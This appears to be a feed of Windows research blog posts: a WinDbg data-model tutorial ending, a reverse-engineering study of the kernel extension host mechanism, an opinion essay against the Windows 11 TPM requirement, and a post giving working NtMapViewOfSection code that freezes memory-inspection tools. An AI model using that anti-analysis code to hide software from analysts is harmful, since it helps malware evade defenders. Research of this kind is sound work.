OpenFile         [OpenFile(path) - Opens a file read/write at the specified path]
TempDirectory    : C:\Users\yshafir\AppData\Local\Temp

We can create files, open them, write into them, delete them or check if a file exists in a certain path. To see a simple example, let’s dump the contents of our current directory — C:\Windows\System32:

dx -r1 Debugger.Utility.FileSystem.CurrentDirectory.Files
Debugger.Utility.FileSystem.CurrentDirectory.Files                
[0x0] : C:\WINDOWS\system32\07409496-a423-4a3e-b620-2cfb01a9318d_HyperV-ComputeNetwork.dll
[0x1] : C:\WINDOWS\system32\1
[0x2] : C:\WINDOWS\system32\103
[0x3] : C:\WINDOWS\system32\108
[0x4] : C:\WINDOWS\system32\11
[0x5] : C:\WINDOWS\system32\113
...
[0x44] : C:\WINDOWS\system32\93
[0x45] : C:\WINDOWS\system32\98
[0x46] : C:\WINDOWS\system32\@AppHelpToast.png
[0x47] : C:\WINDOWS\system32\@AudioToastIcon.png
[0x48] : C:\WINDOWS\system32\@BackgroundAccessToastIcon.png
[0x49] : C:\WINDOWS\system32\@bitlockertoastimage.png
[0x4a] : C:\WINDOWS\system32\@edptoastimage.png
[0x4b] : C:\WINDOWS\system32\@EnrollmentToastIcon.png
[0x4c] : C:\WINDOWS\system32\@language_notification_icon.png
[0x4d] : C:\WINDOWS\system32\@optionalfeatures.png
[0x4e] : C:\WINDOWS\system32\@VpnToastIcon.png
[0x4f] : C:\WINDOWS\system32\@WiFiNotificationIcon.png
[0x50] : C:\WINDOWS\system32\@windows-hello-V4.1.gif
[0x51] : C:\WINDOWS\system32\@WindowsHelloFaceToastIcon.png
[0x52] : C:\WINDOWS\system32\@WindowsUpdateToastIcon.contrast-black.png
[0x53] : C:\WINDOWS\system32\@WindowsUpdateToastIcon.contrast-white.png
[0x54] : C:\WINDOWS\system32\@WindowsUpdateToastIcon.png
[0x55] : C:\WINDOWS\system32\@WirelessDisplayToast.png
[0x56] : C:\WINDOWS\system32\@WwanNotificationIcon.png
[0x57] : C:\WINDOWS\system32\@WwanSimLockIcon.png
[0x58] : C:\WINDOWS\system32\aadauthhelper.dll
[0x59] : C:\WINDOWS\system32\aadcloudap.dll
[0x5a] : C:\WINDOWS\system32\aadjcsp.dll
[0x5b] : C:\WINDOWS\system32\aadtb.dll
[0x5c] : C:\WINDOWS\system32\aadWamExtension.dll
[0x5d] : C:\WINDOWS\system32\AboutSettingsHandlers.dll
[0x5e] : C:\WINDOWS\system32\AboveLockAppHost.dll
[0x5f] : C:\WINDOWS\system32\accessibilitycpl.dll
[0x60] : C:\WINDOWS\system32\accountaccessor.dll
[0x61] : C:\WINDOWS\system32\AccountsRt.dll
[0x62] : C:\WINDOWS\system32\AcGenral.dll
...

We can choose to delete one of these files:

dx -r1 Debugger.Utility.FileSystem.CurrentDirectory.Files[1].Delete()

Or delete it through DeleteFile:

dx Debugger.Utility.FileSystem.DeleteFile(“C:\\WINDOWS\\system32\\71”)

Notice that in this module paths have to have double backslash (“\\”), as they would if we had called the Win32 API ourselves.

As a last exercise we’ll put together a few of the things we learned here — we’re going to create a breakpoint on a kernel variable, get the symbol that accessed it from the stack and write the symbol the accessed it into a file on our host machine.

Let’s break it down into steps:

  • Open a file to write the results to.
  • Create a text writer, which we will use to write into the file.
  • Create a breakpoint for access into a variable. In this case we’ll choose nt!PsInitialSystemProcess and set a breakpoint for read access. We will use the old MASM syntax to run a dx command every time the breakpoint is hit and move on: ba r4 <address> "dx <command>; g"
    Our command will use @$curstack to get the address that accessed the variable, and then use the @$getsym helper function we wrote earlier to find the symbol for it. We’ll use our text writer to write the result into the file.
  • Finally, we will close the file.

Putting it all together:

dx -r0 @$getsym = (x => Debugger.Utility.Control.ExecuteCommand(".printf\"%y\", " + ((__int64)x).ToDisplayString("x"))[0])
dx @$tmpFile = Debugger.Utility.FileSystem.TempDirectory.OpenFile("log.txt")
dx @$txtWriter = Debugger.Utility.FileSystem.CreateTextWriter(@$tmpFile)
ba r4 nt!PsInitialSystemProcess "dx @$txtWriter.WriteLine(@$getsym(@$curstack.Frames[0].Attributes.InstructionOffset)); g"

We let the machine run for as long as we want, and when we want to stop the logging we can disable or clear the breakpoint and close the file with dx @$tmpFile.Close().

Now we can open our @$tmpFile and look at the results:

That’s it! What an amazingly easy way to log information about the debugger!

So that’s the end of our WinDbg series! All the scripts in this series will be uploaded to a github repo, as well as some new ones not included here. I suggest you investigate this data model further, because we didn’t even cover all the different methods it contains. Write cool tools of your own and share them with the world :)

And as long as this guide was, these are not even all the possible options in the new data model. And I didn’t even mention the new support for Javascript! You can get more information about using Javascript in WinDbg and the new and exciting support for TTD (time travel debugging) in this excellent post.

Yes, More Callbacks — The Kernel Extension Mechanism

Yes, More Callbacks — The Kernel Extension Mechanism

Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased)

Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash.

As it turns out, many drivers assume their initialization routine (DriverEntry) is always successful, and don’t take it well when this assumption breaks. j00ru documented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered it better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called “windows kernel host extensions” mechanism.

The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this:

From this crash dump, we can see that Bam.sys registered a process creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed.

The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run for example “!wdbgark.wa_systemcb /type process“ in WinDbg, we’ll see that the callback used by Bam.sys is not found in this array.

Instead, Bam.sys uses a whole other mechanism to register its callbacks.

If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to some variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called “extension table” using this “extension host” and calls the first function in the extension table, which is bam!BampCreateProcessCallback.

If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallback and search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension:

As suspected, Bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually being stored in a function table named Bam!BampKernelCalloutTable, which is later being passed, together with some other parameters (we’ll talk about them in a minute) to the undocumented nt!ExRegisterExtension function.

I tried to search for any documentation or hints for what this function was responsible for, or what this “extension” is, and couldn’t find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure.

Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h:

NTKERNELAPI NTSTATUS ExRegisterExtension (
    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,
    _In_ PVOID RegistrationInfo
);
typedef struct _EX_EXTENSION_REGISTRATION_1 {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    VOID *FunctionTable;
    PVOID *HostInterface;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

After a bit of reverse engineering, I figured that the formal input parameter “PVOID RegistrationInfo” is actually of type PEX_EXTENSION_REGISTRATION_1.

The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points:

  1. nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B).
  2. Then, the function verifies that the amount of functions supplied in RegistrationInfo->FunctionCount matches the expected amount set in the host’s structure. It also makes sure that the host’s FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice.
  3. If everything seems OK, the host’s FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo.
  4. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we’ll discuss it soon.
  5. Eventually, the fully initialized host is returned to the caller via an output parameter.

We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is, where do these hosts come from?

  • During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys:
  • nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY (unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRY structure is undocumented, and looks something like this:
struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the extension 
// contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface; // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before
// and after an extension for this
// host is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable; // a table of the callbacks that the 
// driver “registers”
    DWORD Flags;         // Only uses one bit. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;
  • When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure, containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS in certain occasions, which makes them some kind of callbacks.

Earlier we saw that part of nt!ExRegisterExtension functionality is to set RegistrationInfo->HostInterface (which contains a global variable in the calling driver) to point to some data found in the host structure. Let’s get back to that.

Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don’t receive one at all.

For example, this is the HostInterface that Bam.sys receives:

So the “kernel extensions” mechanism is actually a bi-directional communication port: The driver supplies a list of “callbacks”, to be called on different occasions, and receives a set of functions for its own internal use.

To stick with the example of Bam.sys, let’s take a look at the callbacks that it supplies:

  • BampCreateProcessCallback
  • BampSetThrottleStateCallback
  • BampGetThrottleStateCallback
  • BampSetUserSettings
  • BampGetUserSettingsHandle

The host initialized for Bam.sys “knows” in advance that it should receive a table of 5 functions. These functions must be laid-out in the exact order presented here, since they are called according to their index. As we can see in this case, where the function found in nt!PspBamExtensionHost->FunctionTable[4] is called:

To conclude, there exists a mechanism to “extend” NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers.

I don’t know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I’d love to know :)

Appendix A — Extension hosts initialized by NTOS:

Appendix B — functions pseudo-code:

Appendix C — structures definitions:

struct _HOST_INFORMATION
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    DWORD FunctionCount;
    POOL_TYPE PoolType;
    PVOID HostInterface;
    PVOID FunctionAddress;
    PVOID ArgForFunction;
    PVOID unk;
} HOST_INFORMATION, *PHOST_INFORMATION;

struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the 
// extension contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface;  // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before and
// after an extension for this host
// is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that 
// the driver “registers”
DWORD Flags;                // Only uses one flag. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;;

struct _EX_EXTENSION_REGISTRATION_1
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    PVOID FunctionTable;
    PVOID *HostTable;
    PVOID DriverObject;
}EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

Yes, More Callbacks — The Kernel Extension Mechanism was originally published in Yarden_Shafir on Medium, where people are continuing the conversation by highlighting and responding to this story.

Windows 11: TPMs and Digital Sovereignty

28 June 2021 at 00:00

This article is an opinion held by a subset of members about the potential plan from Microsoft about their enforcement of a TPM to use Windows 11 and various features. This article will not go into great detail about all the good and bad of a TPM; there will be links at the end for you to continue your research, but it will go into the issues we see with enforcement. If you’re unfamiliar with what a TPM is or its general function we recommend taking a look at these links: What is a TPM?; TPM and Attestation.

As you may or may not have already noticed, many people are wondering about Microsoft’s new mandatory TPM 2.0 hardware requirement for Windows 11. If you look around the press releases, shallow technical documentation, and the myriad of buzzwords like “security,” “device health,” “firmware vulnerabilities,” and “malware,” you still haven’t received a straightforward answer as to why exactly you need this tech.

Part of system requirements from Microsoft

Many of you reading this article may have machines around the house or office you built from silicon that isn’t even seven years old. These still play today’s latest games without hiccup or issue, and unless you let your Grandma or 6-year old nephew on the machine recently, you likely don’t have malware either.

So, why do I suddenly need a TPM 2.0 device on my machine, then you ask? Well, the answer is quite simple. It’s not about you; it’s about them.

You see, the PC (emphasis on personal here) is in a way the last bastion of digital freedom you have, and that door is slowly closing. You need to only look at highly locked and controlled systems like consoles and phones to see the disparity.

Political affiliations aside, one can take the Wikileaks app removal from both the Apple store and Google play store as an excellent example of what the world looks like when your device controls you, instead of you controlling the device.

How does a TPM on my PC advance this agenda?

Twenty years ago, Microsoft set forth a goal of “trusted” computing called Palladium. While this technical goal has slowly but surely crept into Windows over the years, it has laid chiefly dormant because of critical missing infrastructure. This being that until recently, quite a large majority of consumer machines did not have a TPM, which you’ll learn later is a critical component to making Palladium work. And while we won’t deny that Bitlocker is excellent for if your device ever gets stolen, we will remind you that Microsoft always sold this tyranny to look great on the surface (no pun intended here).

When Palladium debuted, it was shot out of orbit by proponents of free and open software and back into hiding it went.

Comment about vendor withdrawal problem

So why is the TPM useful? The TPM (along with suitable firmware) is critical to measuring the state of your device - the boot state, in particular, to attest to a remote party that your machine is in a non-rooted state. It’s very similar to the Widevine L1 on Android devices; a third-party can then choose whether or not to serve you content. Everything will suddenly revolve around this “trust factor” of your PC. Imagine you want to watch your favorite show on Netflix in 4k, but your hardware trust factor is low? Too bad you’ll have to settle for the 720p stream. Untrusted devices could be watching in an instance of Linux KVM, and we can’t risk your pirating tools running in the background!

You might think that “It’s okay, though! I can emulate a TPM with KVM; the software already exists!” The unfortunate truth is that it’s not that simple. TPMs have unique keys burned in at manufacture time called Endorsement Keys, and these are unique per TPM. These keys are then cryptographically tied to the vendor who issued them, and as such, not only does a TPM uniquely identify your machine anywhere in the world, but content distributors can pick and choose what TPM vendors they want to trust. Sound familiar to you? It’s called Digital Rights Management, otherwise known as DRM.

Let’s not forget, Intel initially shipped the Pentium III with a built-in serial number unique per chip. Much the same initial fate as Palladium, it was also shot down by privacy groups, and the feature was subject to removal.

A common misunderstanding

There seems to be a lot misconceptions floating around in social media. In this section we’ll highlight one of them:

“I can patch the ISO or download one that removes the requirement.”

You can, sure. Windows and a majority of its components will function fine, similar to if you root your phone. Remember the part earlier, though, about 4k video content? That won’t be available to you (as an example). Whether it be a game or a movie, a vendor of consumable media decides what users they trust with their content. Unfortunately, without a TPM, you aren’t cutting it.

You’ve probably noticed that the marketing for this requirement is vague and confusing, and that’s intentional. It doesn’t do much for you, the consumer. However, it does set the stage for the future where Microsoft begins shipping their TPM on your processor. Enter Microsoft’s Pluton. The same technology is present in the Xbox. It would be an absolute dream come true for companies and vendors with special interests to completely own and control your PC to the same degree as a phone or the Xbox.

While the writers of this article will not deny that device attestation can bring excellent security for the standard consumers of the world, we cannot ignore that it opens the door to the restriction of user privacy and freedoms. It also paves the way to have the PC locked into a nice controllable cube for all the citizens to use.

You can see the wood for the trees here. When a company tells you that you need something, and it’s “for your own good,” and hey, they’re just on a humanitarian aid mission to save you from yourself, one should be highly skeptical. Microsoft is pushing this hard; we can even see them citing entirely dubious statistics. We took this one from The Verge:

“Microsoft has been warning for months that firmware attacks are on the rise. “Our Security Signals report found that 83 percent of businesses experienced a firmware attack, and only 29 percent are allocating resources to protect this critical layer,” says Weston.”

If you read into this link, you will find it cites information from Microsoft themselves, called “Security Signals,” and by the time you’re done reading it, you forgot how you got there in the first place. Not only is this statistic not factual, but successful firmware attacks are incredibly rare. Did we mention that a TPM isn’t going to protect you from UEFI malware that was planted on the device by a rogue agent at manufacture time? What about dynamic firmware attacks? Did you know that technologies such as Intel Boot Guard that have existed for the better part of a decade defend well against such attacks that might seek to overwrite flash memory?

Takeaway

We are here to remind you that the TPM requirement of Windows 11 furthers the agenda to protect the PC against you, its owner. It is one step closer to the lockdown of the PC. As Microsoft won the secure boot battle a decade ago, which is where Microsoft became the sole owner of the Secure Boot keys, this move also further tightens the screws on the liberties the PC gives us. While it won’t be evident immediately upon the launch of Windows 11, the pieces are moving together at a much faster pace.

We ask you to do your research in an age of increased restriction of personal freedom, censorship, and endless media propaganda. We strongly encourage you to research Microsoft’s future Pluton chip.

There are links provided below to research for yourself.

Preventing memory inspection on Windows

24 May 2021 at 00:00

Have you ever wanted your dynamic analysis tool to take as long as GTA V to query memory regions while being impossible to kill and using 100% of the poor CPU core that encountered this? Well, me neither, but the technology is here and it’s quite simple!

What, Where, WTF?

As usual with my anti-debug related posts, everything starts with a little innocuous flag that Microsoft hasn’t documented. Or at least so I thought.

This time the main offender is NtMapViewOfSection, a syscall that can map a section object into the address space of a given process, mainly used for implementing shared memory and memory mapping files (The Win32 API for this would be MapViewOfFile).

1
2
3
4
5
6
7
8
9
10
11
NTSTATUS NtMapViewOfSection(
  HANDLE          SectionHandle,
  HANDLE          ProcessHandle,
  PVOID           *BaseAddress,
  ULONG_PTR       ZeroBits,
  SIZE_T          CommitSize,
  PLARGE_INTEGER  SectionOffset,
  PSIZE_T         ViewSize,
  SECTION_INHERIT InheritDisposition,
  ULONG           AllocationType,
  ULONG           Win32Protect);

By doing a little bit of digging around in ntoskrnl’s MiMapViewOfSection and searching in the Windows headers for known constants, we can recover the meaning behind most valid flag values.

1
2
3
4
5
6
7
8
/* Valid values for AllocationType */
MEM_RESERVE                0x00002000
SEC_PARTITION_OWNER_HANDLE 0x00040000
MEM_TOPDOWN                0x00100000
SEC_NO_CHANGE              0x00400000
SEC_FILE                   0x00800000
MEM_LARGE_PAGES            0x20000000
SEC_WRITECOMBINE           0x40000000

Initially I failed at ctrl+f and didn’t realize that 0x2000 is a known flag, so I started digging deeper. In the same function we can also discover what the flag does and its main limitations.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
// --- MAIN FUNCTIONALITY ---
if (SectionOffset + ViewSize > SectionObject->SizeOfSection &&
    !(AllocationAttributes & 0x2000))
    return STATUS_INVALID_VIEW_SIZE;

// --- LIMITATIONS ---
// Image sections are not allowed
if ((AllocationAttributes & 0x2000) &&
    SectionObject->u.Flags.Image)
    return STATUS_INVALID_PARAMETER;

// Section must have been created with one of these 2 protection values
if ((AllocationAttributes & 0x2000) &&
    !(SectionObject->InitialPageProtection & (PAGE_READWRITE | PAGE_EXECUTE_READWRITE)))
    return STATUS_SECTION_PROTECTION;

// Physical memory sections are not allowed
if ((Params->AllocationAttributes & 0x20002000) &&
    SectionObject->u.Flags.PhysicalMemory)
    return STATUS_INVALID_PARAMETER;

Now, this sounds like a bog standard MEM_RESERVE and it’s possible to VirtualAlloc(MEM_RESERVE) whatever you want as well, however APIs that interact with this memory do treat it differently.

How differently you may ask? Well, after incorrectly identifying the flag as undocumented, I went ahead and attempted to create the biggest section I possibly could. Everything went well until I opened the ProcessHacker memory view. The PC was nigh unusable for at least a minute and after that process hacker remained unresponsive for a while as well. Subsequent runs didn’t seem to seize up the whole system however it still took up to 4 minutes for the NtQueryVirtualMemory call to return.

I guess you could call this a happy little accident as Bob Ross would say.

The cause

Since I’m lazy, instead of diving in and reversing, I decided to use Windows Performance Recorder. It’s a nifty tool that uses ETW tracing to give you a lot of insight into what was happening on the system. The recorded trace can then be viewed in Windows Performance Analyzer.

Trace Viewed in Windows Performance Analyzer

This doesn’t say too much, but at least we know where to look.

After spending some more time staring at the code in everyone’s favourite decompiler it became a bit more clear what’s happening. I’d bet that it’s iterating through every single page table entry for the given memory range. And because we’re dealing with terabytes of of data at a time it’s over a billion iterations. (MiQueryAddressState is a large function, and I didn’t think a short pseudocode snippet would do it justice)

This is also reinforced by the fact that from my testing the relation between view size and time taken is completely linear. To further verify this idea we can also do some quick napkin math to see if it all adds up:

1
2
3
4
5
instructions per second (ips) = 3.8Ghz * ~8
page table entries      (n)   = 12TB / 4096
time taken              (t)   = 3.5 minutes

instruction per page table entry = ips * t / n = ~2000

In my opinion, this number looks rather believable so, with everything added up, I’ll roll with the current idea.

Minimal Example

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
// file handle must be a handle to a non empty file
void* section = nullptr;
auto  status  = NtCreateSection(&section,
                                MAXIMUM_ALLOWED,
                                nullptr,
                                nullptr,
                                PAGE_EXECUTE_READWRITE,
                                SEC_COMMIT,
                                file_handle);
if (!NT_SUCCESS(status))
    return status;

// Personally largest I could get the section was 12TB, but I'm sure people with more
// memory could get it larger.
void* base = nullptr;
for (size_t i = 46;  i > 38; --i) {
    SIZE_T view_size = (1ull << i);
    status           = NtMapViewOfSection(section,
                                          NtCurrentProcess(),
                                          &base,
                                          0,
                                          0x1000,
                                          nullptr,
                                          &view_size,
                                          ViewUnmap,
                                          0x2000, // <- the flag
                                          PAGE_EXECUTE_READWRITE);

    if (NT_SUCCESS(status))
        break;
}

Do note that, ideally, you’d need to surround code with these sections because only the reserved portions of these sections cause the slowdown. Furthermore, transactions could also be a solution for needing a non-empty file without touching anything already existing or creating something visible to the user.

Fin

I think this is a great and powerful technique to mess with people analyzing your code. The resource usage is reasonable, all it takes to set it up is a few syscalls, and it’s unlikely to get accidentally triggered.

❌
❌